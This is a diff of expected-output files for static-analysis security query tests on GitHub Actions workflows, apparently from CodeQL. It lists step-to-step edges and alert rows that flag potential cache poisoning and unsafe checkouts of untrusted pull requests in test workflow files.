+| .github/workflows/test20.yml:25:7:31:4 | Uses Step | .github/workflows/test20.yml:40:7:41:4 | Run Step |
+| .github/workflows/test20.yml:25:7:31:4 | Uses Step | .github/workflows/test20.yml:41:7:42:4 | Run Step |
+| .github/workflows/test20.yml:25:7:31:4 | Uses Step | .github/workflows/test20.yml:42:7:43:4 | Run Step |
+| .github/workflows/test20.yml:25:7:31:4 | Uses Step | .github/workflows/test20.yml:43:7:46:39 | Uses Step |
+| .github/workflows/test20.yml:31:7:33:4 | Uses Step | .github/workflows/test20.yml:33:7:38:4 | Uses Step |
+| .github/workflows/test20.yml:31:7:33:4 | Uses Step | .github/workflows/test20.yml:38:7:40:4 | Run Step |
+| 
.github/workflows/test20.yml:31:7:33:4 | Uses Step | .github/workflows/test20.yml:40:7:41:4 | Run Step |
+| .github/workflows/test20.yml:31:7:33:4 | Uses Step | .github/workflows/test20.yml:41:7:42:4 | Run Step |
+| .github/workflows/test20.yml:31:7:33:4 | Uses Step | .github/workflows/test20.yml:42:7:43:4 | Run Step |
+| .github/workflows/test20.yml:31:7:33:4 | Uses Step | .github/workflows/test20.yml:43:7:46:39 | Uses Step |
+| .github/workflows/test20.yml:33:7:38:4 | Uses Step | .github/workflows/test20.yml:38:7:40:4 | Run Step |
+| .github/workflows/test20.yml:33:7:38:4 | Uses Step | .github/workflows/test20.yml:40:7:41:4 | Run Step |
+| .github/workflows/test20.yml:33:7:38:4 | Uses Step | .github/workflows/test20.yml:41:7:42:4 | Run Step |
+| .github/workflows/test20.yml:33:7:38:4 | Uses Step | .github/workflows/test20.yml:42:7:43:4 | Run Step |
+| .github/workflows/test20.yml:33:7:38:4 | Uses Step | .github/workflows/test20.yml:43:7:46:39 | Uses Step |
+| .github/workflows/test20.yml:38:7:40:4 | Run Step | .github/workflows/test20.yml:40:7:41:4 | Run Step |
+| .github/workflows/test20.yml:38:7:40:4 | Run Step | .github/workflows/test20.yml:41:7:42:4 | Run Step |
+| .github/workflows/test20.yml:38:7:40:4 | Run Step | .github/workflows/test20.yml:42:7:43:4 | Run Step |
+| .github/workflows/test20.yml:38:7:40:4 | Run Step | .github/workflows/test20.yml:43:7:46:39 | Uses Step |
+| .github/workflows/test20.yml:40:7:41:4 | Run Step | .github/workflows/test20.yml:41:7:42:4 | Run Step |
+| .github/workflows/test20.yml:40:7:41:4 | Run Step | .github/workflows/test20.yml:42:7:43:4 | Run Step |
+| .github/workflows/test20.yml:40:7:41:4 | Run Step | .github/workflows/test20.yml:43:7:46:39 | Uses Step |
+| .github/workflows/test20.yml:41:7:42:4 | Run Step | .github/workflows/test20.yml:42:7:43:4 | Run Step |
+| .github/workflows/test20.yml:41:7:42:4 | Run Step | .github/workflows/test20.yml:43:7:46:39 | Uses Step |
+| .github/workflows/test20.yml:42:7:43:4 | Run Step | 
.github/workflows/test20.yml:43:7:46:39 | Uses Step |
+#select
+| .github/workflows/test1.yml:18:9:22:6 | Uses Step | .github/workflows/test1.yml:13:9:18:6 | Uses Step | .github/workflows/test1.yml:18:9:22:6 | Uses Step | Potential cache poisoning in the context of the default branch |
+| .github/workflows/test2.yml:14:9:18:6 | Uses Step | .github/workflows/test2.yml:11:9:14:6 | Uses Step | .github/workflows/test2.yml:14:9:18:6 | Uses Step | Potential cache poisoning in the context of the default branch |
+| .github/workflows/test3.yml:14:9:22:6 | Uses Step | .github/workflows/test3.yml:11:9:14:6 | Uses Step | .github/workflows/test3.yml:14:9:22:6 | Uses Step | Potential cache poisoning in the context of the default branch |
+| .github/workflows/test6.yml:13:9:17:6 | Uses Step | .github/workflows/test6.yml:10:9:13:6 | Uses Step | .github/workflows/test6.yml:13:9:17:6 | Uses Step | Potential cache poisoning in the context of the default branch |
+| .github/workflows/test7.yml:13:9:16:6 | Uses Step | .github/workflows/test7.yml:10:9:13:6 | Uses Step | .github/workflows/test7.yml:13:9:16:6 | Uses Step | Potential cache poisoning in the context of the default branch |
+| .github/workflows/test8.yml:15:9:17:2 | Run Step | .github/workflows/test8.yml:12:9:15:6 | Uses Step | .github/workflows/test8.yml:15:9:17:2 | Run Step | Potential cache poisoning in the context of the default branch |
+| .github/workflows/test8.yml:26:9:28:2 | Uses Step | .github/workflows/test8.yml:23:9:26:6 | Uses Step | .github/workflows/test8.yml:26:9:28:2 | Uses Step | Potential cache poisoning in the context of the default branch |
+| .github/workflows/test8.yml:37:9:37:75 | Run Step | .github/workflows/test8.yml:34:9:37:6 | Uses Step | .github/workflows/test8.yml:37:9:37:75 | Run Step | Potential cache poisoning in the context of the default branch |
+| .github/workflows/test11.yml:19:9:23:6 | Uses Step | .github/workflows/test11.yml:14:9:19:6 | Uses Step | 
.github/workflows/test11.yml:19:9:23:6 | Uses Step | Potential cache poisoning in the context of the default branch |
+| .github/workflows/test15.yml:17:9:21:6 | Uses Step | .github/workflows/test15.yml:14:9:17:6 | Uses Step | .github/workflows/test15.yml:17:9:21:6 | Uses Step | Potential cache poisoning in the context of the default branch |
+| .github/workflows/test16.yml:17:9:21:6 | Uses Step | .github/workflows/test16.yml:14:9:17:6 | Uses Step | .github/workflows/test16.yml:17:9:21:6 | Uses Step | Potential cache poisoning in the context of the default branch |
+| .github/workflows/test17.yml:22:9:26:31 | Uses Step | .github/workflows/test17.yml:15:9:20:6 | Uses Step | .github/workflows/test17.yml:22:9:26:31 | Uses Step | Potential cache poisoning in the context of the default branch |
+| .github/workflows/test20.yml:33:7:38:4 | Uses Step | .github/workflows/test20.yml:18:7:25:4 | Uses Step | .github/workflows/test20.yml:33:7:38:4 | Uses Step | Potential cache poisoning in the context of the default branch |
+| .github/workflows/test20.yml:38:7:40:4 | Run Step | .github/workflows/test20.yml:18:7:25:4 | Uses Step | .github/workflows/test20.yml:38:7:40:4 | Run Step | Potential cache poisoning in the context of the default branch |
+| .github/workflows/test20.yml:41:7:42:4 | Run Step | .github/workflows/test20.yml:18:7:25:4 | Uses Step | .github/workflows/test20.yml:41:7:42:4 | Run Step | Potential cache poisoning in the context of the default branch |
+| .github/workflows/test20.yml:42:7:43:4 | Run Step | .github/workflows/test20.yml:18:7:25:4 | Uses Step | .github/workflows/test20.yml:42:7:43:4 | Run Step | Potential cache poisoning in the context of the default branch |
diff --git a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected
index 92d5a0b5ce18..29b311435dd5 100644
--- a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected
+++ b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected 
@@ -1,8 +1,265 @@
-| .github/workflows/auto_ci.yml:20:9:27:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. |
-| .github/workflows/auto_ci.yml:67:9:74:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. |
-| .github/workflows/gitcheckout.yml:10:11:18:8 | Run Step | Potential unsafe checkout of untrusted pull request on privileged workflow. |
-| .github/workflows/level0.yml:99:9:103:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. |
-| .github/workflows/level0.yml:125:9:129:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. |
-| .github/workflows/mend.yml:22:9:29:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. |
-| .github/workflows/untrusted_checkout.yml:10:9:13:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. |
-| .github/workflows/untrusted_checkout.yml:13:9:16:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. 
|
+edges
+| .github/workflows/actor_trusted_checkout.yml:9:7:14:4 | Uses Step | .github/workflows/actor_trusted_checkout.yml:14:7:15:4 | Uses Step |
+| .github/workflows/actor_trusted_checkout.yml:9:7:14:4 | Uses Step | .github/workflows/actor_trusted_checkout.yml:15:7:19:4 | Run Step |
+| .github/workflows/actor_trusted_checkout.yml:9:7:14:4 | Uses Step | .github/workflows/actor_trusted_checkout.yml:19:7:23:4 | Uses Step |
+| .github/workflows/actor_trusted_checkout.yml:9:7:14:4 | Uses Step | .github/workflows/actor_trusted_checkout.yml:23:7:26:21 | Uses Step |
+| .github/workflows/actor_trusted_checkout.yml:14:7:15:4 | Uses Step | .github/workflows/actor_trusted_checkout.yml:15:7:19:4 | Run Step |
+| .github/workflows/actor_trusted_checkout.yml:14:7:15:4 | Uses Step | .github/workflows/actor_trusted_checkout.yml:19:7:23:4 | Uses Step |
+| .github/workflows/actor_trusted_checkout.yml:14:7:15:4 | Uses Step | .github/workflows/actor_trusted_checkout.yml:23:7:26:21 | Uses Step |
+| .github/workflows/actor_trusted_checkout.yml:15:7:19:4 | Run Step | .github/workflows/actor_trusted_checkout.yml:19:7:23:4 | Uses Step |
+| .github/workflows/actor_trusted_checkout.yml:15:7:19:4 | Run Step | .github/workflows/actor_trusted_checkout.yml:23:7:26:21 | Uses Step |
+| .github/workflows/actor_trusted_checkout.yml:19:7:23:4 | Uses Step | .github/workflows/actor_trusted_checkout.yml:23:7:26:21 | Uses Step |
+| .github/workflows/artifactpoisoning7.yml:8:9:16:6 | Uses Step | .github/workflows/artifactpoisoning7.yml:16:9:20:6 | Run Step: artifact |
+| .github/workflows/artifactpoisoning7.yml:8:9:16:6 | Uses Step | .github/workflows/artifactpoisoning7.yml:20:9:21:52 | Run Step |
+| .github/workflows/artifactpoisoning7.yml:16:9:20:6 | Run Step: artifact | .github/workflows/artifactpoisoning7.yml:20:9:21:52 | Run Step |
+| .github/workflows/artifactpoisoning11.yml:13:9:32:6 | Uses Step | .github/workflows/artifactpoisoning11.yml:32:9:36:6 | Run Step |
+| 
.github/workflows/artifactpoisoning11.yml:13:9:32:6 | Uses Step | .github/workflows/artifactpoisoning11.yml:36:9:38:78 | Run Step |
+| .github/workflows/artifactpoisoning11.yml:32:9:36:6 | Run Step | .github/workflows/artifactpoisoning11.yml:36:9:38:78 | Run Step |
+| .github/workflows/artifactpoisoning12.yml:13:9:32:6 | Uses Step | .github/workflows/artifactpoisoning12.yml:32:9:36:6 | Run Step |
+| .github/workflows/artifactpoisoning12.yml:13:9:32:6 | Uses Step | .github/workflows/artifactpoisoning12.yml:36:9:38:62 | Run Step |
+| .github/workflows/artifactpoisoning12.yml:32:9:36:6 | Run Step | .github/workflows/artifactpoisoning12.yml:36:9:38:62 | Run Step |
+| .github/workflows/artifactpoisoning21.yml:13:9:18:6 | Uses Step | .github/workflows/artifactpoisoning21.yml:18:9:20:21 | Run Step |
+| .github/workflows/artifactpoisoning22.yml:13:9:17:6 | Uses Step | .github/workflows/artifactpoisoning22.yml:17:9:18:20 | Run Step |
+| .github/workflows/artifactpoisoning31.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning31.yml:15:9:18:6 | Run Step |
+| .github/workflows/artifactpoisoning31.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning31.yml:18:9:19:23 | Run Step |
+| .github/workflows/artifactpoisoning31.yml:15:9:18:6 | Run Step | .github/workflows/artifactpoisoning31.yml:18:9:19:23 | Run Step |
+| .github/workflows/artifactpoisoning32.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning32.yml:16:9:18:20 | Run Step |
+| .github/workflows/artifactpoisoning33.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning33.yml:16:9:18:20 | Run Step |
+| .github/workflows/artifactpoisoning34.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning34.yml:16:9:20:6 | Uses Step |
+| .github/workflows/artifactpoisoning34.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning34.yml:20:9:22:23 | Run Step |
+| .github/workflows/artifactpoisoning34.yml:16:9:20:6 | Uses Step | .github/workflows/artifactpoisoning34.yml:20:9:22:23 | 
Run Step |
+| .github/workflows/artifactpoisoning41.yml:13:9:21:6 | Run Step | .github/workflows/artifactpoisoning41.yml:21:9:22:23 | Run Step |
+| .github/workflows/artifactpoisoning42.yml:13:9:21:6 | Run Step | .github/workflows/artifactpoisoning42.yml:21:9:22:19 | Run Step |
+| .github/workflows/artifactpoisoning51.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning51.yml:15:9:18:6 | Run Step |
+| .github/workflows/artifactpoisoning51.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning51.yml:18:9:20:57 | Run Step |
+| .github/workflows/artifactpoisoning51.yml:15:9:18:6 | Run Step | .github/workflows/artifactpoisoning51.yml:18:9:20:57 | Run Step |
+| .github/workflows/artifactpoisoning52.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning52.yml:15:9:18:6 | Run Step |
+| .github/workflows/artifactpoisoning52.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning52.yml:18:9:23:40 | Run Step |
+| .github/workflows/artifactpoisoning52.yml:15:9:18:6 | Run Step | .github/workflows/artifactpoisoning52.yml:18:9:23:40 | Run Step |
+| .github/workflows/artifactpoisoning53.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning53.yml:15:9:18:6 | Run Step |
+| .github/workflows/artifactpoisoning53.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning53.yml:18:9:23:29 | Run Step |
+| .github/workflows/artifactpoisoning53.yml:15:9:18:6 | Run Step | .github/workflows/artifactpoisoning53.yml:18:9:23:29 | Run Step |
+| .github/workflows/artifactpoisoning61.yml:20:9:41:6 | Uses Step | .github/workflows/artifactpoisoning61.yml:41:9:53:6 | Run Step: prepare |
+| .github/workflows/artifactpoisoning61.yml:20:9:41:6 | Uses Step | .github/workflows/artifactpoisoning61.yml:53:9:53:50 | Run Step |
+| .github/workflows/artifactpoisoning61.yml:41:9:53:6 | Run Step: prepare | .github/workflows/artifactpoisoning61.yml:53:9:53:50 | Run Step |
+| .github/workflows/auto_ci.yml:20:9:27:6 | Uses Step | .github/workflows/auto_ci.yml:27:9:32:6 
| Uses Step |
+| .github/workflows/auto_ci.yml:20:9:27:6 | Uses Step | .github/workflows/auto_ci.yml:32:9:37:6 | Run Step |
+| .github/workflows/auto_ci.yml:20:9:27:6 | Uses Step | .github/workflows/auto_ci.yml:37:9:40:6 | Run Step |
+| .github/workflows/auto_ci.yml:20:9:27:6 | Uses Step | .github/workflows/auto_ci.yml:40:9:44:6 | Run Step |
+| .github/workflows/auto_ci.yml:20:9:27:6 | Uses Step | .github/workflows/auto_ci.yml:44:9:48:6 | Run Step |
+| .github/workflows/auto_ci.yml:20:9:27:6 | Uses Step | .github/workflows/auto_ci.yml:48:9:52:2 | Run Step |
+| .github/workflows/auto_ci.yml:27:9:32:6 | Uses Step | .github/workflows/auto_ci.yml:32:9:37:6 | Run Step |
+| .github/workflows/auto_ci.yml:27:9:32:6 | Uses Step | .github/workflows/auto_ci.yml:37:9:40:6 | Run Step |
+| .github/workflows/auto_ci.yml:27:9:32:6 | Uses Step | .github/workflows/auto_ci.yml:40:9:44:6 | Run Step |
+| .github/workflows/auto_ci.yml:27:9:32:6 | Uses Step | .github/workflows/auto_ci.yml:44:9:48:6 | Run Step |
+| .github/workflows/auto_ci.yml:27:9:32:6 | Uses Step | .github/workflows/auto_ci.yml:48:9:52:2 | Run Step |
+| .github/workflows/auto_ci.yml:32:9:37:6 | Run Step | .github/workflows/auto_ci.yml:37:9:40:6 | Run Step |
+| .github/workflows/auto_ci.yml:32:9:37:6 | Run Step | .github/workflows/auto_ci.yml:40:9:44:6 | Run Step |
+| .github/workflows/auto_ci.yml:32:9:37:6 | Run Step | .github/workflows/auto_ci.yml:44:9:48:6 | Run Step |
+| .github/workflows/auto_ci.yml:32:9:37:6 | Run Step | .github/workflows/auto_ci.yml:48:9:52:2 | Run Step |
+| .github/workflows/auto_ci.yml:37:9:40:6 | Run Step | .github/workflows/auto_ci.yml:40:9:44:6 | Run Step |
+| .github/workflows/auto_ci.yml:37:9:40:6 | Run Step | .github/workflows/auto_ci.yml:44:9:48:6 | Run Step |
+| .github/workflows/auto_ci.yml:37:9:40:6 | Run Step | .github/workflows/auto_ci.yml:48:9:52:2 | Run Step |
+| .github/workflows/auto_ci.yml:40:9:44:6 | Run Step | .github/workflows/auto_ci.yml:44:9:48:6 | Run Step |
+| 
.github/workflows/auto_ci.yml:40:9:44:6 | Run Step | .github/workflows/auto_ci.yml:48:9:52:2 | Run Step |
+| .github/workflows/auto_ci.yml:44:9:48:6 | Run Step | .github/workflows/auto_ci.yml:48:9:52:2 | Run Step |
+| .github/workflows/auto_ci.yml:67:9:74:6 | Uses Step | .github/workflows/auto_ci.yml:74:9:79:6 | Uses Step |
+| .github/workflows/auto_ci.yml:67:9:74:6 | Uses Step | .github/workflows/auto_ci.yml:79:9:84:6 | Run Step |
+| .github/workflows/auto_ci.yml:67:9:74:6 | Uses Step | .github/workflows/auto_ci.yml:84:9:93:6 | Run Step |
+| .github/workflows/auto_ci.yml:67:9:74:6 | Uses Step | .github/workflows/auto_ci.yml:93:9:96:6 | Uses Step |
+| .github/workflows/auto_ci.yml:67:9:74:6 | Uses Step | .github/workflows/auto_ci.yml:96:9:108:6 | Run Step: stage_files |
+| .github/workflows/auto_ci.yml:67:9:74:6 | Uses Step | .github/workflows/auto_ci.yml:108:9:119:6 | Uses Step: create_pr |
+| .github/workflows/auto_ci.yml:67:9:74:6 | Uses Step | .github/workflows/auto_ci.yml:119:9:125:6 | Run Step |
+| .github/workflows/auto_ci.yml:67:9:74:6 | Uses Step | .github/workflows/auto_ci.yml:125:9:133:6 | Uses Step |
+| .github/workflows/auto_ci.yml:67:9:74:6 | Uses Step | .github/workflows/auto_ci.yml:133:9:135:20 | Run Step |
+| .github/workflows/auto_ci.yml:74:9:79:6 | Uses Step | .github/workflows/auto_ci.yml:79:9:84:6 | Run Step |
+| .github/workflows/auto_ci.yml:74:9:79:6 | Uses Step | .github/workflows/auto_ci.yml:84:9:93:6 | Run Step |
+| .github/workflows/auto_ci.yml:74:9:79:6 | Uses Step | .github/workflows/auto_ci.yml:93:9:96:6 | Uses Step |
+| .github/workflows/auto_ci.yml:74:9:79:6 | Uses Step | .github/workflows/auto_ci.yml:96:9:108:6 | Run Step: stage_files |
+| .github/workflows/auto_ci.yml:74:9:79:6 | Uses Step | .github/workflows/auto_ci.yml:108:9:119:6 | Uses Step: create_pr |
+| .github/workflows/auto_ci.yml:74:9:79:6 | Uses Step | .github/workflows/auto_ci.yml:119:9:125:6 | Run Step |
+| .github/workflows/auto_ci.yml:74:9:79:6 | Uses Step | 
.github/workflows/auto_ci.yml:125:9:133:6 | Uses Step |
+| .github/workflows/auto_ci.yml:74:9:79:6 | Uses Step | .github/workflows/auto_ci.yml:133:9:135:20 | Run Step |
+| .github/workflows/auto_ci.yml:79:9:84:6 | Run Step | .github/workflows/auto_ci.yml:84:9:93:6 | Run Step |
+| .github/workflows/auto_ci.yml:79:9:84:6 | Run Step | .github/workflows/auto_ci.yml:93:9:96:6 | Uses Step |
+| .github/workflows/auto_ci.yml:79:9:84:6 | Run Step | .github/workflows/auto_ci.yml:96:9:108:6 | Run Step: stage_files |
+| .github/workflows/auto_ci.yml:79:9:84:6 | Run Step | .github/workflows/auto_ci.yml:108:9:119:6 | Uses Step: create_pr |
+| .github/workflows/auto_ci.yml:79:9:84:6 | Run Step | .github/workflows/auto_ci.yml:119:9:125:6 | Run Step |
+| .github/workflows/auto_ci.yml:79:9:84:6 | Run Step | .github/workflows/auto_ci.yml:125:9:133:6 | Uses Step |
+| .github/workflows/auto_ci.yml:79:9:84:6 | Run Step | .github/workflows/auto_ci.yml:133:9:135:20 | Run Step |
+| .github/workflows/auto_ci.yml:84:9:93:6 | Run Step | .github/workflows/auto_ci.yml:93:9:96:6 | Uses Step |
+| .github/workflows/auto_ci.yml:84:9:93:6 | Run Step | .github/workflows/auto_ci.yml:96:9:108:6 | Run Step: stage_files |
+| .github/workflows/auto_ci.yml:84:9:93:6 | Run Step | .github/workflows/auto_ci.yml:108:9:119:6 | Uses Step: create_pr |
+| .github/workflows/auto_ci.yml:84:9:93:6 | Run Step | .github/workflows/auto_ci.yml:119:9:125:6 | Run Step |
+| .github/workflows/auto_ci.yml:84:9:93:6 | Run Step | .github/workflows/auto_ci.yml:125:9:133:6 | Uses Step |
+| .github/workflows/auto_ci.yml:84:9:93:6 | Run Step | .github/workflows/auto_ci.yml:133:9:135:20 | Run Step |
+| .github/workflows/auto_ci.yml:93:9:96:6 | Uses Step | .github/workflows/auto_ci.yml:96:9:108:6 | Run Step: stage_files |
+| .github/workflows/auto_ci.yml:93:9:96:6 | Uses Step | .github/workflows/auto_ci.yml:108:9:119:6 | Uses Step: create_pr |
+| .github/workflows/auto_ci.yml:93:9:96:6 | Uses Step | 
.github/workflows/auto_ci.yml:119:9:125:6 | Run Step |
+| .github/workflows/auto_ci.yml:93:9:96:6 | Uses Step | .github/workflows/auto_ci.yml:125:9:133:6 | Uses Step |
+| .github/workflows/auto_ci.yml:93:9:96:6 | Uses Step | .github/workflows/auto_ci.yml:133:9:135:20 | Run Step |
+| .github/workflows/auto_ci.yml:96:9:108:6 | Run Step: stage_files | .github/workflows/auto_ci.yml:108:9:119:6 | Uses Step: create_pr |
+| .github/workflows/auto_ci.yml:96:9:108:6 | Run Step: stage_files | .github/workflows/auto_ci.yml:119:9:125:6 | Run Step |
+| .github/workflows/auto_ci.yml:96:9:108:6 | Run Step: stage_files | .github/workflows/auto_ci.yml:125:9:133:6 | Uses Step |
+| .github/workflows/auto_ci.yml:96:9:108:6 | Run Step: stage_files | .github/workflows/auto_ci.yml:133:9:135:20 | Run Step |
+| .github/workflows/auto_ci.yml:108:9:119:6 | Uses Step: create_pr | .github/workflows/auto_ci.yml:119:9:125:6 | Run Step |
+| .github/workflows/auto_ci.yml:108:9:119:6 | Uses Step: create_pr | .github/workflows/auto_ci.yml:125:9:133:6 | Uses Step |
+| .github/workflows/auto_ci.yml:108:9:119:6 | Uses Step: create_pr | .github/workflows/auto_ci.yml:133:9:135:20 | Run Step |
+| .github/workflows/auto_ci.yml:119:9:125:6 | Run Step | .github/workflows/auto_ci.yml:125:9:133:6 | Uses Step |
+| .github/workflows/auto_ci.yml:119:9:125:6 | Run Step | .github/workflows/auto_ci.yml:133:9:135:20 | Run Step |
+| .github/workflows/auto_ci.yml:125:9:133:6 | Uses Step | .github/workflows/auto_ci.yml:133:9:135:20 | Run Step |
+| .github/workflows/dependabot1.yml:15:9:19:6 | Uses Step | .github/workflows/dependabot1.yml:19:9:23:6 | Run Step: nvm |
+| .github/workflows/dependabot1.yml:15:9:19:6 | Uses Step | .github/workflows/dependabot1.yml:23:9:28:6 | Uses Step |
+| .github/workflows/dependabot1.yml:15:9:19:6 | Uses Step | .github/workflows/dependabot1.yml:28:9:31:6 | Run Step |
+| .github/workflows/dependabot1.yml:15:9:19:6 | Uses Step | .github/workflows/dependabot1.yml:31:9:34:6 | Run Step |
+| 
.github/workflows/dependabot1.yml:15:9:19:6 | Uses Step | .github/workflows/dependabot1.yml:34:9:36:2 | Run Step |
+| .github/workflows/dependabot1.yml:19:9:23:6 | Run Step: nvm | .github/workflows/dependabot1.yml:23:9:28:6 | Uses Step |
+| .github/workflows/dependabot1.yml:19:9:23:6 | Run Step: nvm | .github/workflows/dependabot1.yml:28:9:31:6 | Run Step |
+| .github/workflows/dependabot1.yml:19:9:23:6 | Run Step: nvm | .github/workflows/dependabot1.yml:31:9:34:6 | Run Step |
+| .github/workflows/dependabot1.yml:19:9:23:6 | Run Step: nvm | .github/workflows/dependabot1.yml:34:9:36:2 | Run Step |
+| .github/workflows/dependabot1.yml:23:9:28:6 | Uses Step | .github/workflows/dependabot1.yml:28:9:31:6 | Run Step |
+| .github/workflows/dependabot1.yml:23:9:28:6 | Uses Step | .github/workflows/dependabot1.yml:31:9:34:6 | Run Step |
+| .github/workflows/dependabot1.yml:23:9:28:6 | Uses Step | .github/workflows/dependabot1.yml:34:9:36:2 | Run Step |
+| .github/workflows/dependabot1.yml:28:9:31:6 | Run Step | .github/workflows/dependabot1.yml:31:9:34:6 | Run Step |
+| .github/workflows/dependabot1.yml:28:9:31:6 | Run Step | .github/workflows/dependabot1.yml:34:9:36:2 | Run Step |
+| .github/workflows/dependabot1.yml:31:9:34:6 | Run Step | .github/workflows/dependabot1.yml:34:9:36:2 | Run Step |
+| .github/workflows/dependabot1.yml:39:9:43:6 | Uses Step | .github/workflows/dependabot1.yml:43:9:45:29 | Uses Step |
+| .github/workflows/dependabot2.yml:33:9:38:6 | Uses Step | .github/workflows/dependabot2.yml:38:9:42:6 | Run Step: nvm |
+| .github/workflows/dependabot2.yml:33:9:38:6 | Uses Step | .github/workflows/dependabot2.yml:42:9:47:6 | Uses Step |
+| .github/workflows/dependabot2.yml:33:9:38:6 | Uses Step | .github/workflows/dependabot2.yml:47:9:52:6 | Run Step |
+| .github/workflows/dependabot2.yml:33:9:38:6 | Uses Step | .github/workflows/dependabot2.yml:52:9:58:6 | Run Step |
+| .github/workflows/dependabot2.yml:33:9:38:6 | Uses Step | 
.github/workflows/dependabot2.yml:58:9:61:6 | Run Step |
+| .github/workflows/dependabot2.yml:33:9:38:6 | Uses Step | .github/workflows/dependabot2.yml:61:9:68:19 | Run Step |
+| .github/workflows/dependabot2.yml:38:9:42:6 | Run Step: nvm | .github/workflows/dependabot2.yml:42:9:47:6 | Uses Step |
+| .github/workflows/dependabot2.yml:38:9:42:6 | Run Step: nvm | .github/workflows/dependabot2.yml:47:9:52:6 | Run Step |
+| .github/workflows/dependabot2.yml:38:9:42:6 | Run Step: nvm | .github/workflows/dependabot2.yml:52:9:58:6 | Run Step |
+| .github/workflows/dependabot2.yml:38:9:42:6 | Run Step: nvm | .github/workflows/dependabot2.yml:58:9:61:6 | Run Step |
+| .github/workflows/dependabot2.yml:38:9:42:6 | Run Step: nvm | .github/workflows/dependabot2.yml:61:9:68:19 | Run Step |
+| .github/workflows/dependabot2.yml:42:9:47:6 | Uses Step | .github/workflows/dependabot2.yml:47:9:52:6 | Run Step |
+| .github/workflows/dependabot2.yml:42:9:47:6 | Uses Step | .github/workflows/dependabot2.yml:52:9:58:6 | Run Step |
+| .github/workflows/dependabot2.yml:42:9:47:6 | Uses Step | .github/workflows/dependabot2.yml:58:9:61:6 | Run Step |
+| .github/workflows/dependabot2.yml:42:9:47:6 | Uses Step | .github/workflows/dependabot2.yml:61:9:68:19 | Run Step |
+| .github/workflows/dependabot2.yml:47:9:52:6 | Run Step | .github/workflows/dependabot2.yml:52:9:58:6 | Run Step |
+| .github/workflows/dependabot2.yml:47:9:52:6 | Run Step | .github/workflows/dependabot2.yml:58:9:61:6 | Run Step |
+| .github/workflows/dependabot2.yml:47:9:52:6 | Run Step | .github/workflows/dependabot2.yml:61:9:68:19 | Run Step |
+| .github/workflows/dependabot2.yml:52:9:58:6 | Run Step | .github/workflows/dependabot2.yml:58:9:61:6 | Run Step |
+| .github/workflows/dependabot2.yml:52:9:58:6 | Run Step | .github/workflows/dependabot2.yml:61:9:68:19 | Run Step |
+| .github/workflows/dependabot2.yml:58:9:61:6 | Run Step | .github/workflows/dependabot2.yml:61:9:68:19 | Run Step |
+| 
.github/workflows/gitcheckout.yml:10:11:18:8 | Run Step | .github/workflows/gitcheckout.yml:18:11:21:8 | Uses Step |
+| .github/workflows/gitcheckout.yml:10:11:18:8 | Run Step | .github/workflows/gitcheckout.yml:21:11:23:22 | Run Step |
+| .github/workflows/gitcheckout.yml:18:11:21:8 | Uses Step | .github/workflows/gitcheckout.yml:21:11:23:22 | Run Step |
+| .github/workflows/issue_comment_3rd_party_action.yml:12:9:16:6 | Uses Step: comment-branch | .github/workflows/issue_comment_3rd_party_action.yml:16:9:22:2 | Uses Step |
+| .github/workflows/issue_comment_3rd_party_action.yml:25:9:30:6 | Uses Step: comment-branch | .github/workflows/issue_comment_3rd_party_action.yml:30:9:36:2 | Uses Step |
+| .github/workflows/issue_comment_3rd_party_action.yml:39:9:45:6 | Uses Step: refs | .github/workflows/issue_comment_3rd_party_action.yml:45:9:49:6 | Uses Step |
+| .github/workflows/issue_comment_3rd_party_action.yml:39:9:45:6 | Uses Step: refs | .github/workflows/issue_comment_3rd_party_action.yml:49:9:52:25 | Uses Step |
+| .github/workflows/issue_comment_3rd_party_action.yml:45:9:49:6 | Uses Step | .github/workflows/issue_comment_3rd_party_action.yml:49:9:52:25 | Uses Step |
+| .github/workflows/issue_comment_heuristic.yml:11:9:24:6 | Uses Step: get-pr-info | .github/workflows/issue_comment_heuristic.yml:24:9:28:6 | Run Step: get-sha |
+| .github/workflows/issue_comment_heuristic.yml:11:9:24:6 | Uses Step: get-pr-info | .github/workflows/issue_comment_heuristic.yml:28:9:33:2 | Uses Step |
+| .github/workflows/issue_comment_heuristic.yml:24:9:28:6 | Run Step: get-sha | .github/workflows/issue_comment_heuristic.yml:28:9:33:2 | Uses Step |
+| .github/workflows/issue_comment_heuristic.yml:37:7:48:4 | Run Step: vars | .github/workflows/issue_comment_heuristic.yml:48:7:50:46 | Uses Step |
+| .github/workflows/issue_comment_octokit.yml:12:9:19:6 | Uses Step: fetch_issue | .github/workflows/issue_comment_octokit.yml:19:9:26:6 | Uses Step: fetch_pr |
+| 
.github/workflows/issue_comment_octokit.yml:12:9:19:6 | Uses Step: fetch_issue | .github/workflows/issue_comment_octokit.yml:26:9:30:6 | Uses Step |
+| .github/workflows/issue_comment_octokit.yml:12:9:19:6 | Uses Step: fetch_issue | .github/workflows/issue_comment_octokit.yml:30:9:35:2 | Uses Step |
+| .github/workflows/issue_comment_octokit.yml:19:9:26:6 | Uses Step: fetch_pr | .github/workflows/issue_comment_octokit.yml:26:9:30:6 | Uses Step |
